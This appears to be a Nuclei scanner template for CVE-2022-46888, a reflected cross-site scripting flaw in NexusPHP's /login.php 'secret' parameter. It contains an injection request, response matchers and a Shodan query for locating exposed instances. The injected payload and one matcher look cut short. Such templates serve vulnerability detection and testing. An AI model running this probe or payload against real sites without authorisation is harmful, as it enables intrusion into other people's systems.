id: CVE-2022-46888 info: name: NexusPHP - Cross-Site Scripting author: r3Y3r53 severity: medium description: | NexusPHPbefore 1.7.33 allow remote attackers to inject arbitrary web script or HTML via the secret parameter in /login.php. reference: - https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities - https://nvd.nist.gov/vuln/detail/CVE-2022-46888 metadata: verified: true shodan-query: http.favicon.hash:-582931176 tags: cve,cve2022,nexus,php,nexusphp,xss requests: - method: GET path: - '{{BaseURL}}/login.php?secret=">' matchers-condition: and matchers: - type: word part: body words: - 'value="">">' - 'NexusPHP' condition: and case-insensitive: true - type: word part: header words: - text/html - type: status status: - 200